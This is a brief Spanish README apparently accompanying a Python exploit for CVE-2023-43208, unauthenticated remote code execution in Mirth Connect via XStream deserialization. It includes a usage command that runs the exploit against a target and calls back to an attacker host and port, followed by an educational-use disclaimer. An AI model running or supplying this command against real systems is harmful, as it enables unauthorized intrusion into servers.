
Implementación en Python de CVE-2023-43208: RCE en Mirth Connect (XStream sin autenticar)
Este exploit aprovecha una vulnerabilidad crítica de deserialización en el motor XStream de Mirth Connect. Se origina en un parche incompleto para CVE-2023-37679, lo que permite la ejecución de código arbitrario no autenticada en todas las versiones anteriores a la 4.4.1.
python3 mirth_rce.py https://{target} <attacker_host> <attacker_port>
Este script de exploit está destinado estrictamente a fines educativos y a auditorías de seguridad autorizadas para ayudar a los defensores a mitigar CVE-2023-43208; cualquier uso de esta herramienta contra objetivos no autorizados es ilegal y es responsabilidad exclusiva del usuario final. El autor proporciona este software "tal cual" sin garantías de ningún tipo, declina toda responsabilidad por posibles usos indebidos o daños, y no aprueba ni fomenta actividades no autorizadas. Úselo bajo su propio riesgo y solo en cumplimiento de las leyes aplicables.